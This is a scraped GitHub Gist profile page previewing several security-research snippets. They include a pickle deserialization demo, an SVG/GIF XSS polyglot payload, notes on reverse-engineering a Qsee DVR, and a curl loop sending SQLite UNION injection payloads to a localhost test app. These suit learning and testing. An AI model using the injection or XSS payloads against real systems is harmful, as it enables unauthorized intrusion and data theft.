@thewb
thewb / safe_pickle.py
Created May 12, 2025 16:27
Java LAOIS (look ahead deserialization) implemented in Python
#!/usr/bin/python3
from pickletools import genops
from pickle import dump
from pickle import loads
from datetime import datetime
class MaliciousClass:
    def __reduce__(self):
        return (print, ("Malicious code executed!",))
@thewb
thewb / optimus_prime.py
Last active January 6, 2025 17:44
caching prime check
#!/usr/bin/python3
import sys
import sqlite3
import pickle
import random
prime_cache_messages = {
    "new_prime_cached": "Dude, we just snagged a freshie prime!",
    "prime_high_five": "High five, bro! Just scored another prime!",
    "totally_rad_prime": "Whoa! This prime is totally rad!",
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
@thewb
thewb / test.svg
Last active December 30, 2024 19:55
xss svg
@thewb
thewb / qsee-qt5682.md
Last active December 20, 2024 19:38
Qsee QT5682 DVR

Introduction

The Qsee QT5682 is a security camera DVR system that can support up to eight cameras. The DVR software listens on TCP port 6036, and thick clients for major operating systems can be downloaded from a web server hosted on the device.

This project started with reverse-engineering functions in the Objective-C (macOS) client binary, which are used to marshal data from XML into the custom communication protocol over TCP port 6036.

A valid protocol message, reverse-engineered from the marshaling code, was bit-flipped and transmitted until it caused the DVR system to crash and reboot.

To further explore the cause of the crash, a shell on the DVR or a firmware dump is required. An Nmap scan showed that the DVR has a listening Telnet service, but the login credentials (username: admin, password: 123456) were rejected. This appears to be out-of-band management and is not mentioned in the device documentation.

1's Complement

num & -1 -> r
#include <stdio.h>
@thewb
thewb / oneliners.md
Created September 22, 2024 18:55
easy to type password for devices ig?
python3 -c "import secrets; import string; c = string.ascii_uppercase + string.ascii_lowercase + string.digits; print(''.join([secrets.choice(c) if i % 5 != 0 else '-' for i in range(1,35)]))"
python3 -c "import secrets; import string; c = string.ascii_uppercase + string.ascii_lowercase + string.digits; print(''.join([secrets.choice(c) for i in range(32)]))"
@thewb
thewb / Vagrant-M1-Install.bash
Created September 19, 2024 19:25 — forked from beauwilliams/Vagrant-M1-Install.bash
Run x86 VM's on Mac M1 arm using vagrant with qemu hypervisor
brew install vagrant qemu
#Due to dependency errors, we must install vbguest first..
vagrant plugin install vagrant-vbguest
vagrant plugin install vagrant-qemu
#cd to working dir you like to keep your vagrant files
cd ~/VM-and-containers/VagrantMachines/M1-vagrantfiles/ubuntu18-generic-64/
#Create a vagrant file
$EDITOR Vagrantfile
@thewb
thewb / sqli.md
Created September 13, 2024 15:59
sqlite3 union injection via JSON/POST in bash one-liner

union injection json/post with curl

Uses "chinook" sqlite3 database @ https://github.com/lerocha/chinook-database

for i in $(seq 1 20); do
  NULLS=$(printf 'NULL, %.0s' $(seq 1 $i))
  NULLS=${NULLS%, }
  curl --max-time 2 -d "{\"city\":\"edmonton' UNION SELECT $NULLS,name FROM sqlite_master WHERE type='table';\"}" -H "Content-Type: application/json" -X POST "http://localhost:3000/data"
  sleep 1
done